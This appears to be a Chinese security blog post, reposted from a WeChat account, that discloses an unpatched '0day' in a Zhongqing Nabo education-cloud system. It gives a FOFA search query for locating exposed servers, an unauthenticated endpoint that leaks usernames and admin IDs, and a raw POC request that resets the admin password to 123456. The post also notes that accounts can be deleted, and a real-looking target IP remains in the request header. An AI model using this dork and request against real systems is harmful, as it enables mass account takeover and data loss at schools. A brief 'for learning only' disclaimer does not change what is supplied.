漏洞复现 | (0day通用)中庆纳博某系统敏感信息泄露+未授权

admin 2021年11月1日22:59:00评论630 views字数 1192阅读3分58秒阅读模式


这是F12sec的第62篇原创 


申明:本次测试只作为学习用处,请勿未授权进行渗透测试,切勿用于其它用途!

ps此0day由团队师傅AGONI贡献,转载请注明来源。

1.漏洞背景

北京中庆纳博信息技术有限公司,简称中庆纳博,是有20年历史的中庆集团旗下核心企业,专注于教育信息化的深度应用领域。产品以教育软件为主,核心产品为“中庆教育云”平台。公司成立三年多来,客户已遍及全国各地,“中庆教育云”亦成为业内的知名品牌。

漏洞复现 | (0day通用)中庆纳博某系统敏感信息泄露+未授权

2.fofa语法

fofa语法:"中庆纳博"

漏洞复现 | (0day通用)中庆纳博某系统敏感信息泄露+未授权

3.漏洞利用

http://xxxxxx/api/TeacherQuery/SearchTeacherInSiteWithPagerRecords

访问此链接,可以看见泄露用户名,以及管理id。然后可以通过 用户名重置密码为默认密码123456

poc如下 :

POST /api/User/ResetPassword HTTP/1.1
Host: xxxxxxxxxx
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, /
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/json;charset=utf-8
Content-Length: 23
Origin: http://117.36.154.34:8010
DNT: 1
Connection: close
Referer: http://xxxxxxxx/default/admin/user/index{"loginName":"admin"}也可以通过 id删除账户
——————————————————————————


  • 往期精彩推荐

❤️爱心三连击

1.关注公众号「F12sec」

2.本文已收录在F12sec官方网站:http://www.0dayhack.net/

3.看到这里了就点个关注支持下吧,你的「关注」是我创作的动力。

漏洞复现 | (0day通用)中庆纳博某系统敏感信息泄露+未授权
漏洞复现 | (0day通用)中庆纳博某系统敏感信息泄露+未授权


公众号:F12sec

QQ群:884338047

官方网站:http://www.0dayhack.net/

这是一个终身学习的团队,他们在坚持自己热爱的事情,欢迎加入F12sec,和师傅们一起开心的挖洞~

        关注和转发是莫大鼓励❤️




本文始发于微信公众号(F12sec):漏洞复现 | (0day通用)中庆纳博某系统敏感信息泄露+未授权

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年11月1日22:59:00
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   漏洞复现 | (0day通用)中庆纳博某系统敏感信息泄露+未授权http://cn-sec.com/archives/416638.html

发表评论

匿名网友 填写信息